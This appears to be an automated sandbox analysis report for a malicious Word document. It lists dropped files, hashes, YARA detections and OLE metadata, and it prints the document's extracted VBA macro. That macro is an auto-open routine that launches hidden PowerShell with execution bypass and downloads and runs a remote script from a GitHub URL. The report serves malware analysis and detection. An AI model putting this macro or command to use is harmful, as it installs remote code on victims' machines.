                                                                                                  • 140.82.121.3
                                                                                                  Bill_630781.xlsbGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133
                                                                                                  • 140.82.121.3
                                                                                                  Purchase Order PO03112021STK.docxGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133
                                                                                                  • 140.82.121.3
                                                                                                  Payment 846725.xlsbGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133
                                                                                                  • 140.82.121.3
                                                                                                  inv-16731.xlsbGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133
                                                                                                  • 140.82.121.3
                                                                                                  Purchase Order PO03112021STK.docxGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133
                                                                                                  • 140.82.121.3
                                                                                                  INV 683068.xlsbGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133
                                                                                                  • 140.82.121.3
                                                                                                  Payment-4091.xlsbGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133
                                                                                                  • 140.82.121.3
                                                                                                  Bill.61566.xlsbGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133
                                                                                                  • 140.82.121.3
                                                                                                  inv-53639.xlsbGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133
                                                                                                  • 140.82.121.3
                                                                                                  INV.738108.xlsbGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133
                                                                                                  • 140.82.121.3
                                                                                                  Order.48868.xlsbGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133
                                                                                                  • 140.82.121.3
                                                                                                  inv.030976.xlsbGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133
                                                                                                  • 140.82.121.3
                                                                                                  INV 362996.xlsbGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133
                                                                                                  • 140.82.121.3
                                                                                                  Copy of Quote_ref-05550.xlsmGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133
                                                                                                  • 140.82.121.3
                                                                                                  RFQ - 0211.docxGet hashmaliciousBrowse
                                                                                                  • 185.199.108.133
                                                                                                  • 140.82.121.3

                                                                                                  Dropped Files

                                                                                                  No context

                                                                                                  Created / dropped Files

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{A8188D20-C63E-41BC-839A-5E99E4F44AC7}.tmp
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14848
                                                                                                  Entropy (8bit):3.3725979630377574
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:3ytv5uI73ysCMbgC46c2GpJW/RA1wabyB0C6PkTg1vC+X0jkbA6jwqgW6aajix2:itTrysR0F6KKeyUxN0jksS5a
                                                                                                  MD5:4FACF23F7684483187C7F5C8A95A3EC3
                                                                                                  SHA1:8E6DBBEB3D712567E4AFA6F1EE316D8E45D82BCD
                                                                                                  SHA-256:9C270C24CBA8E693CBB0B0C0751FEBD30A4C415DC2CE27BD14C93ABDEC77EF5E
                                                                                                  SHA-512:749F996FFF891F82A348A9B462297D4148F61F69AA18630091FAA898678958977AEDF5E3884EC46CDB12434EF8C33C78A44D5552E4F0809DA8DF9BBDE594EFA4
                                                                                                  Malicious:false
                                                                                                  Yara Hits:
                                                                                                  • Rule: PowerShell_in_Word_Doc, Description: Detects a powershell and bypass keyword in a Word document, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{A8188D20-C63E-41BC-839A-5E99E4F44AC7}.tmp, Author: Florian Roth
                                                                                                  • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{A8188D20-C63E-41BC-839A-5E99E4F44AC7}.tmp, Author: Florian Roth
                                                                                                  Reputation:low
                                                                                                  Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D1CEAA27-5E98-4FA5-88E5-2DF8BA910B6B}.tmp
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1024
                                                                                                  Entropy (8bit):0.05390218305374581
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:ol3lYdn:4Wn
                                                                                                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                  Malicious:false
                                                                                                  Reputation:high, very likely benign file
                                                                                                  Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\Local\Temp\~DF37E635CE383E64B4.TMP
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):512
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3::
                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                  Malicious:false
                                                                                                  Reputation:moderate, very likely benign file
                                                                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\Local\Temp\~DFB0DD1817E66C3CA2.TMP
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14336
                                                                                                  Entropy (8bit):3.5165141323354954
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:tTnUby6wGAO0jkebEw7ZtmnX9fpzJi9XUaE:ZUbyPGAO0jkytyNfpzJi9i
                                                                                                  MD5:1D1A6717B98F1EBC58340B03478D7BB3
                                                                                                  SHA1:7D8B09518284020B55A0E46D01E3D979B899463A
                                                                                                  SHA-256:77076EF5A7A01AC30CB3DD960BB7C2CE674DB9EC05E4E2F319DCC89B17F56BFA
                                                                                                  SHA-512:BD46EFB2B91EC2C3AECB5FA58ACB183E9F83496730EDFCFB2B7A2F65B9B1CCA5ECBB197D70D782F47514ED707B6FA87088D905474B3E34C958D3D5B08FC12E0E
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: PowerShell_in_Word_Doc, Description: Detects a powershell and bypass keyword in a Word document, Source: C:\Users\user\AppData\Local\Temp\~DFB0DD1817E66C3CA2.TMP, Author: Florian Roth
                                                                                                  • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: C:\Users\user\AppData\Local\Temp\~DFB0DD1817E66C3CA2.TMP, Author: Florian Roth
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  Reputation:low
                                                                                                  Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\RfORrHIRNe.LNK
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:09:03 2021, mtime=Mon Aug 30 20:09:03 2021, atime=Thu Nov 4 08:10:23 2021, length=38912, window=hide
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1014
                                                                                                  Entropy (8bit):4.536793283070465
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:8fBrFgXg/XAlCPCHaXmk5BeXB/0JX+W2McTOflIicvbVJJlEDtZ3YilMMEpxRljN:8fB3/XTD5wXo17eRlEDv3q6Qd7Qy
                                                                                                  MD5:B266F1082FC57506C2BF5EB8FFB78305
                                                                                                  SHA1:8127B59ADCBE2D4C45731B8CC3AD2E346E846501
                                                                                                  SHA-256:40AC6DC59826CD2E0170CDBD798F0A42983E48FE65CAD7416999FE8D9501EF70
                                                                                                  SHA-512:7251449BB45B8499A8295F40D7242470D72D02F0F49762F007D1F9D18D93B8B05827FC30118F3112D41B2F30B6098CAB0C5D78C7F2C9C5D2EF6CE103093C94C5
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview: L..................F.... ...5..B...5..B....f..[................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S#...user.8......QK.X.S#.*...&=....U...............A.l.b.u.s.....z.1......S$...Desktop.d......QK.X.S$.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2.....dSLI .RFORRH~1.DOC..J.......S"..S".*.........................R.f.O.R.r.H.I.R.N.e...d.o.c.......x...............-...8...[............?J......C:\Users\..#...................\\048707\Users.user\Desktop\RfORrHIRNe.doc.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.R.f.O.R.r.H.I.R.N.e...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......048707..........D_....3N...W...9..g............[D_....3N...W...9..g...
                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):71
                                                                                                  Entropy (8bit):4.5549224798255485
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:bDuMJlvQ9sm2mX1esm2v:bCkurUrI
                                                                                                  MD5:8DC46D624D55247F3AFCDF57A59AD13A
                                                                                                  SHA1:8AF5CE5B75E603C633DF82EBED33186753FB52BC
                                                                                                  SHA-256:903B82AD8418567C1F8EB0127EA8A86876D3C8CC86C10D1606B4D6CC7F82F2B8
                                                                                                  SHA-512:32D98F2F022128F67B3DF32680F1E45F3DAE22E7CEF27EEC184E4492A9C19A2C78DF7065D30C7C16A7C1D28558DB23B36D691283521609D16075A3A3B0E0205C
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview: [folders]..Templates.LNK=0..RfORrHIRNe.LNK=0..[doc]..RfORrHIRNe.LNK=0..
                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):162
                                                                                                  Entropy (8bit):2.5038355507075254
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                                                  MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                                                  SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                                                  SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                                                  SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                                                  Malicious:false
                                                                                                  Reputation:moderate, very likely benign file
                                                                                                  Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msar (copy)
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):8016
                                                                                                  Entropy (8bit):3.576861516597677
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:chQCoMq/qvsqvJCwoUz8hQCoMq/qvsEHyqvJCworaz5fYoH3F2QxlUVWA2:c2yoUz826Hnoraz55F2QTA2
                                                                                                  MD5:FAAE98B11184BE3D6BB52CBA6C0652B6
                                                                                                  SHA1:071516ACBA817DC61F815F8AB06E9894511BE39E
                                                                                                  SHA-256:A3C6C74C2F81E4CB67B9836D12EAF03CB1C3A023CC5D54D7B602F14AA90EBC8A
                                                                                                  SHA-512:81D2547D09974AFAB7662C465B36EC387FB3FDFAC579D95F6668D98DC56BC88FE687975257F6D0C04B8ACF00AB8CED0021884F9AE979D9CD03DAD872B9BDDB61
                                                                                                  Malicious:false
                                                                                                  Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S%...Programs..f.......:...S%.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DWONBQMPU6GVS2C7EY4N.temp
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):8016
                                                                                                  Entropy (8bit):3.576861516597677
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:chQCoMq/qvsqvJCwoUz8hQCoMq/qvsEHyqvJCworaz5fYoH3F2QxlUVWA2:c2yoUz826Hnoraz55F2QTA2
                                                                                                  MD5:FAAE98B11184BE3D6BB52CBA6C0652B6
                                                                                                  SHA1:071516ACBA817DC61F815F8AB06E9894511BE39E
                                                                                                  SHA-256:A3C6C74C2F81E4CB67B9836D12EAF03CB1C3A023CC5D54D7B602F14AA90EBC8A
                                                                                                  SHA-512:81D2547D09974AFAB7662C465B36EC387FB3FDFAC579D95F6668D98DC56BC88FE687975257F6D0C04B8ACF00AB8CED0021884F9AE979D9CD03DAD872B9BDDB61
                                                                                                  Malicious:false
                                                                                                  Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S%...Programs..f.......:...S%.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                  C:\Users\user\Desktop\~$ORrHIRNe.doc
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):162
                                                                                                  Entropy (8bit):2.5038355507075254
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                                                  MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                                                  SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                                                  SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                                                  SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                                                  Malicious:false
                                                                                                  Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                                  Static File Info

                                                                                                  General

                                                                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Admin, Template: Normal.dotm, Last Saved By: Admin, Revision Number: 12, Name of Creating Application: Microsoft Office Word, Total Editing Time: 07:00, Create Time/Date: Wed Nov 3 22:06:00 2021, Last Saved Time/Date: Wed Nov 3 22:17:00 2021, Number of Pages: 1, Number of Words: 10, Number of Characters: 61, Security: 0
                                                                                                  Entropy (8bit):3.971846508462655
                                                                                                  TrID:
                                                                                                  • Microsoft Word document (32009/1) 54.23%
                                                                                                  • Microsoft Word document (old ver.) (19008/1) 32.20%
                                                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
                                                                                                  File name:RfORrHIRNe.doc
                                                                                                  File size:38912
                                                                                                  MD5:955d5d2855b291a3cf1fc6655bbbbb79
                                                                                                  SHA1:b58901cf8967310228bc6e4c224b2cfaf014bc65
                                                                                                  SHA256:63acfd6633bf3fe6462d8de72904338e2a97392654d8b39a97d18b9e7f3b25b8
                                                                                                  SHA512:044f7164d30798656cb0f17f1a7ab76cdceb2f6bfb1107f04a6f300d2551459d0804a03db76591a7a10a900fddc8a7da5d9442ec4846709f9c9684e1aaeaf14e
                                                                                                  SSDEEP:384:o/MMMOtM1ulwUmDoKdAa8WRGbiSAoKXMVkK54miJ2JLN0jUDt3ou0FeK:o/MMMOtM1ulwU0T1MVkzmM2fxyu0FeK
                                                                                                  File Content Preview:........................>......................./...........2..................................................................................................................................................................................................

                                                                                                  File Icon

                                                                                                  Icon Hash:e4eea2aaa4b4b4a4

                                                                                                  Static OLE Info

                                                                                                  General

                                                                                                  Document Type:OLE
                                                                                                  Number of OLE Files:1

                                                                                                  OLE File "RfORrHIRNe.doc"

                                                                                                  Indicators

                                                                                                  Has Summary Info:True
                                                                                                  Application Name:Microsoft Office Word
                                                                                                  Encrypted Document:False
                                                                                                  Contains Word Document Stream:True
                                                                                                  Contains Workbook/Book Stream:False
                                                                                                  Contains PowerPoint Document Stream:False
                                                                                                  Contains Visio Document Stream:False
                                                                                                  Contains ObjectPool Stream:
                                                                                                  Flash Objects Count:
                                                                                                  Contains VBA Macros:True

                                                                                                  Summary

                                                                                                  Code Page:1251
                                                                                                  Title:
                                                                                                  Subject:
                                                                                                  Author:Admin
                                                                                                  Keywords:
                                                                                                  Comments:
                                                                                                  Template:Normal.dotm
                                                                                                  Last Saved By:Admin
                                                                                                  Revion Number:12
                                                                                                  Total Edit Time:420
                                                                                                  Create Time:2021-11-03 22:06:00
                                                                                                  Last Saved Time:2021-11-03 22:17:00
                                                                                                  Number of Pages:1
                                                                                                  Number of Words:10
                                                                                                  Number of Characters:61
                                                                                                  Creating Application:Microsoft Office Word
                                                                                                  Security:0

                                                                                                  Document Summary

                                                                                                  Document Code Page:1251
                                                                                                  Number of Lines:1
                                                                                                  Number of Paragraphs:1
                                                                                                  Thumbnail Scaling Desired:False
                                                                                                  Company:
                                                                                                  Contains Dirty Links:False
                                                                                                  Shared Document:False
                                                                                                  Changed Hyperlinks:False
                                                                                                  Application Version:1048576
                                                                                                  Language:

                                                                                                  Streams with VBA

                                                                                                  VBA File Name: NewMacros.bas, Stream Size: 1428
                                                                                                  General
                                                                                                  Stream Path:Macros/VBA/NewMacros
                                                                                                  VBA File Name:NewMacros.bas
                                                                                                  Stream Size:1428
                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . [ . . . . . . . . . . . . . . . . z . C . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                  Data Raw:01 16 03 00 04 f0 00 00 00 1a 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 5b 03 00 00 a3 04 00 00 00 00 00 00 01 00 00 00 ef 7a b0 43 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                  VBA Code
                                                                                                  Attribute VB_Name = "NewMacros"
Sub Autoopen()
    Shell ("Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')")
End Sub
                                                                                                  VBA File Name: ThisDocument.cls, Stream Size: 1159
                                                                                                  General
                                                                                                  Stream Path:Macros/VBA/ThisDocument
                                                                                                  VBA File Name:ThisDocument.cls
                                                                                                  Stream Size:1159
                                                                                                  Data ASCII:. . . . . . . . . T . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . z . z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . m . . ! . N . . . . . . . . D . > . . . I C . . . . . . < . . . . . . . . . . . . . . . . . . . . . 4 Y < O B . < J . . . > . \\ U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . 4 Y < O B . < J . . . > . \\ U . . . m . . ! . N . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                  Data Raw:01 16 03 00 06 00 01 00 00 54 03 00 00 e4 00 00 00 ea 01 00 00 82 03 00 00 90 03 00 00 e4 03 00 00 00 00 00 00 01 00 00 00 ef 7a b9 7a 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 d4 99 6d f6 e0 21 c5 4e 9a 91 e1 9f 98 e5 c3 ad 44 9c 3e c5 84 dc 49 43 a3 a3 b7 96 9e 92 3c cf 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                  VBA Code
                                                                                                  Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

                                                                                                  Streams

                                                                                                  Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                                                                  General
                                                                                                  Stream Path:\x1CompObj
                                                                                                  File Type:data
                                                                                                  Stream Size:114
                                                                                                  Entropy:4.42107393569
                                                                                                  Base64 Encoded:True
                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
                                                                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 c4 ee ea f3 ec e5 ed f2 20 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                  General
                                                                                                  Stream Path:\x5DocumentSummaryInformation
                                                                                                  File Type:data
                                                                                                  Stream Size:4096
                                                                                                  Entropy:0.262838901893
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                  Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 00 01 00 00 0d 00 00 00 01 00 00 00 70 00 00 00 0f 00 00 00 78 00 00 00 1b 00 00 00 84 00 00 00 05 00 00 00 90 00 00 00 06 00 00 00 98 00 00 00 11 00 00 00 a0 00 00 00 17 00 00 00 a8 00 00 00 0b 00 00 00 b0 00 00 00 10 00 00 00 b8 00 00 00
                                                                                                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                  General
                                                                                                  Stream Path:\x5SummaryInformation
                                                                                                  File Type:data
                                                                                                  Stream Size:4096
                                                                                                  Entropy:0.460733334731
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 4 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A d m i n . . . . . . . . . . . . . . . . . . .
                                                                                                  Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 ec 00 00 00 09 00 00 00 fc 00 00 00
                                                                                                  Stream Path: 1Table, File Type: data, Stream Size: 7076
                                                                                                  General
                                                                                                  Stream Path:1Table
                                                                                                  File Type:data
                                                                                                  Stream Size:7076
                                                                                                  Entropy:5.95668538259
                                                                                                  Base64 Encoded:True
                                                                                                  Data ASCII:. . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
